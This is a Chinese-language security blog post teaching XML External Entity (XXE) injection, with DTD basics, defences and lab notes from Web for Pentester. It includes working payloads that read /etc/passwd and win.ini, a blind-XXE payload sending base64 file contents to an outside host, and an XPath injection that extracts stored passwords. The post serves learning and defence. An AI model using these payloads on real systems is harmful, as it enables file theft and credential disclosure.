Loading

【XXE学习】XML外部实体注入

一、XML外部实体注入介绍

1.1 XXE简介

  XML外部实体注入(XML External Entity Injection)也就是人们(mian shi guan )常说的XXE啦,见名知意,就是对于不安全的外部实体进行处理时引发的安全漏洞

1.2 XXE可以做什么?

读取本地文件

端口探测

.....

只要权限够基本啥都能干了

1.3 XXE原理

XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

xxe漏洞触发的点往往是可以上传XML文件约位置,没有对上传的XML文件进行过滤,导致可以上传恶意的XML文件。

二、XML基础知识

2.1 XML简介

  XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。XML被设计为传输和存储数据,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。

   注意:要点:libxml2.9.1及以后,默认不解析外部实体。Linux中需要将libxml低于libxml2.9.1的版本编译到PHP中,可以使用phpinfo()查看libxml的版本信息。

下面看一个XML文档的实例:有点类似于HTML,具体细节可以参照w3cschool的文档查看。

 

 

2.2 DTD介绍

  DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据类型有限,无法对元素或属性的内容进行详细规范,在可读性和可扩展性方面也比不上XML Schema。

2.3 使用DTD实体攻击的方式  

  下面再介绍一下实体 (ENTITY)整个概念,如果需要在XML文档种频繁的使用某一条数据,我们可以预先给这个数据起一个别名,也就是一个ENTITY,之后再在文档种调用它。

  DTD实体的引用有内部声明实体和外部引用实体的区别。按类型分则分为:内置实体,字符实体,通用实体,参数实体。

常见的在于参数实体和其他实体之间引用时的区别:  

 0x01 内部实体声明

格式为:

<!DOCTYPE  文件名 [
<!ENTITY  实体名 "实体内容">
]>
定义好的ENTITY在文档中通过“&实体名;”来使用。

 

例如:下面定义了一个name的实体,实体的值为Zh1z3ven,定义好了之后就可以在aaa这个文件内部通过&实体名;进行调用。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa[
<!ENTITY name "Zh1z3ven">
]>
<root>
<name>&name;</name>

上面展示的是一个内部DTD的声明,而外部的DTD实体则需要通过URL来远程调用一个.dtd文本文件,也或者可以利用file协议引用一个本地的文件;当然也支持其他的协议,不过不同的语言支持的协议不一样,可以参照下图。

 

 

0x02 外部实体调用

 1.利用file协议 :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "file:///c:/windows/win.ini" >
]>
<name>&name;</name>

2.利用http协议:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "http://127.0.0.1/123.txt" >
]>
<name>&name;</name>

 

 

 3 参数实体+外部实体

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
    <!ENTITY % name SYSTEM "http://127.0.0.1/123.txt">
    %name;
]>

例子:

XML内容:

大致逻辑是通过参数实体% name调用test.dtd之后在XML里调用dtd中的test实体来读取文件内容

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
    <!ENTITY % name SYSTEM "http://127.0.0.1/test.dtd">
    %name;
]>
<d>&test;</d>

DTD(test.dtd)文件内容

 

 结果:

 

 三 XXE利用的几种姿势

1. 利用file协议读取本地文件(如etc/passwd)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE aaa [
<!ENTITY name SYSTEM "file:///etc/passwd" >
]>
<name>&name;</name>

2.利用参数实体调用.dtd文件之后在XML里调用dtd中的声明的实体来读取文件内容

 

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
    <!ENTITY % name SYSTEM "http://127.0.0.1/test.dtd">
    %name;
]>
<d>&test;</d>

 

test.dtd内容:

<!ENTITY test SYSTEM "file:///etc/passwd">

3.盲XXE思路:

(Orz这里还未自己验证,知识从网上搬运的,有环境的同学可以复现一下)

如果实战场景下XML没有回显,可以利用构造好的payload在读取存在XXE漏洞服务器文件的同时利用

php://filter将文件内容发送到攻击者服务器,那么访问服务器的web日志就可以看到此次攻击结果。

 

ps:首先这是一个file关键字的get参数传递,
php://是一种协议名称,php://filter/是一种访问本地文件的协议,
/read=convert.base64-encode/表示读取的方式是base64编码后,
resource=/etc/passwd表示目标文件为/etc/passwd。
这个php://filter据说经常来构造ThinkPHP的RCE漏洞   ---Orz  :(

<!DOCTYPE a [ 
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd SYSTEM "http://www.hackersb.cn/attack.dtd">
%dtd;
%mydata;
]>

这里日志获取的内容记得base64解码就好,通过看日志或者wireshark抓包都可以看到

attack.dtd内容为

<!ENTITY % all
"<!ENTITY &#x25; mydata SYSTEM "http://www.hackersb.cn/?%file">"
>

4.其他思路

既然可以使用file 那么也可以用http来造成SSRF或者利用gopher协议当然也可以探测端口等等

基本啥都能干了

 

四 关于XXE的防御

4.1 禁用外部实体

如PHP中的libxml_disable_entity_loader(true);

其他语言:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

 

4.2 过滤用户提交的XML数据

如SYSTEM或者PUBLIC以及一些协议 file等



4.3 附上写本文的参考连接

https://security.tencent.com/index.php/blog/msg/69

https://www.hackersb.cn/hacker/211.html

php://filter妙用

php://filter在实战当中的奇技淫巧

https://www.freebuf.com/sectool/156863.html

https://www.hackersb.cn/hacker/211.html

https://thief.one/2017/06/20/1/

https://github.com/CHYbeta/Web-Security-Learning#xxe

 

 

 

 

(PS:下面是做web_for_pentester时XML注入的一些笔记 懒得删了 可以直接略过 )

 

 

ENTITY实体:

如果在XML文档中需要频繁使用某一条数据,我们可以预先给这个数据起一个别名。即一个ENTITY,然后再在文档中调用它。

XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种在为参数在DTD文件中使用。

ENTITY的定义语法:

<!DOCTYPE  文件名 [
<!ENTITY  实体名 "实体内容">
]>
定义好的ENTITY在文档中通过“&实体名;”来使用。

例如:定义一个name值为“Tom”,就可以在XML任何地方引用。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE balabala [
<!ENTITY name "Tom" >

]>
<root>
<name>&name;</name>
</root>

正常来说,DTD分为内部DTD与外部DTD,内部DTD包含在XML文档中,外部DTD则通过URL引用.一个DTD文件是以.dtd结尾的文本文件 。前面还要加上SYSTEM,但是如果此处没有任何过滤,我们完全可以引用系统敏感文件的,前提是页面有回显,否则你只引用了文件但不知道文件内容。

例如 Linux和Windows下的读取路径不一样

//Linux下读取/etc/passwd
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE balabala [ <!ENTITY name SYSTEM "file:///etc/passwd" > ]> <name>&name;</name>

//Windows下读取C:/windows/win.ini
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE balabala [
<!ENTITY name SYSTEM "file:///c:/windows/win.ini" >
]>
<name>&name;</name>

 

三、Example

Example1

下面先看一下后端代码:

<?php require_once("../header.php"); ?>
Hello  
<?php
  $xml=simplexml_load_string($_GET['xml']);
  print_r((string)$xml);
?>
<?php require_once("../footer.php"); ?>

simplexml_load_string() 函数可以转换形式良好的XML字符串为SimpleXMLElement对象

print_r()可以把字符串和数字简单地打印出来,而数组则以括起来的键和值得列表形式显示,并以Array开头。但print_r()输出布尔值和NULL的结果没有意义,因为都是打印”\n”。因此用var_dump()函数更适合调试。打印关于变量的易于理解的信息,如果给出的是 string、integer 或 float,将打印变量值本身。如果给出的是 array,将会按照一定格式显示键和元素。object 与数组类似。 记住,print_r() 将把数组的指针移到最后边。使用 reset() 可让指针回到开始处。

 

利用方法

先构造基本框架  注意&name后要有;原文应该是笔误漏掉了。xml全部要写到一行里,构造好的语句需要进行URL编码

<!DOCTYPE xxx[<!ENTITY name "hacker">]><name>&name;</name>
//URL编码:
%3C!DOCTYPE%20xxx%5B%3C!ENTITY%20name%20%22hacker%22%3E%5D%3E%3Cname%3E%26name%3B%3C%2Fname%3

尝试读取本地文件/etc/passwd

<!DOCTYPE xxx[<!ENTITY name SYSTEM "file:///etc/passwd">]><name>&name;</name>

//URL编码:
%3C!DOCTYPE%20xxx%5B%3C!ENTITY%20name%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cname%3E%26name%3B%3C%2Fname%3E

 

 

Example2

后端代码:

<?php require_once("../header.php"); 

  $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml=simplexml_load_string($x);
  $xpath = "users/user/name[.='".$_GET['name']."']/parent::*/message";
  $res = ($xml->xpath($xpath));
  while(list( ,$node) = each($res)) {
      echo $node;
  } 
?>
<?php require_once("../footer.php"); ?>

可以看到源代码先定义了一个$x变量,里面包含了一个xml。

然后把的 XML 字符串转换为 SimpleXMLElement 对象,并赋值给$res

然后查询了users里user里的name 值为$name的,并返回其所有父节点的message里面的值。

然后执行查询,最后while循环显示查询的值。

 

XPath介绍:

XPath 是一门在 XML 文档中查找信息的语言。XPath 可用来在 XML 文档中对元素和属性进行遍历。

XPath 是 W3C XSLT 标准的主要元素,并且 XQuery 和 XPointer 都构建于 XPath 表达之上。

因此,对 XPath 的理解是很多高级 XML 应用的基础。

 

XPath基本语法:

路径表达式         结果
bookstore         选取 bookstore 元素的所有子节点。
/bookstore         选取根元素 bookstore。
bookstore/book     选取属于 bookstore 的子元素的所有 book 元素。
//book             选取所有 book子元素,而不管它们在文档中的位置。
bookstore//book     选择属于 bookstore 元素的后代的所有 book 元素,而不管它们位于 bookstore 之下的什么位置。
//@lang             选取名为 lang 的所有属性。

/表示从XML文件中的根节点开始解析

//表示在XML文件中匹配已选择的当前节点,且不考虑其位置关系XPath Axes(轴)轴可以定义当前节点的节点集,下面列举了几个常用的。

ancestor            选取当前节点的所有先辈(父、祖父等)。
ancestor-or-self    选取当前节点的所有先辈(父、祖父等)以及当前节点本身。
attribute            选取当前节点的所有属性。
child                选取当前节点的所有子元素。
descendant            选取当前节点的所有后代元素(子、孙等)。
descendant-or-self    选取当前节点的所有后代元素(子、孙等)以及当前节点本身。
following            选取文档中当前节点的结束标签之后的所有节点。
namespace            选取当前节点的所有命名空间节点。
parent                选取当前节点的父节点。

了解了轴,再来了解一下,下面举几个例子更便于了解:

child::book            选取所有属于当前节点的子元素的 book 节点。
attribute::lang        选取当前节点的 lang 属性。
child::*            选取当前节点的所有子元素。
attribute::*        选取当前节点的所有属性。
child::text()        选取当前节点的所有文本子节点。
child::node()        选取当前节点的所有子节点。
descendant::book    选取当前节点的所有 book 后代。
ancestor::book        选择当前节点的所有 book 先辈。
ancestor-or-self::book    选取当前节点的所有 book 先辈以及当前节点(如果此节点是 book 节点)
child::*/child::price    选取当前节点的所有 price 孙节点。

 最后的最后,我们尝试构造,还是注入的思路,先尝试正确闭合,然后注释掉后面没用的。

?name=hacker' or 1=1]/parent::*/child::node()%00 
//%00注释掉后面的语句
// /parent::*/child::node()查看当前节点的所有父节点的子节点

 

 

?name=hacker' or 1=1]/parent::*/password%00

 

posted @ 2020-07-04 00:10  Zh1z3ven  阅读(894)  评论(0编辑  收藏  举报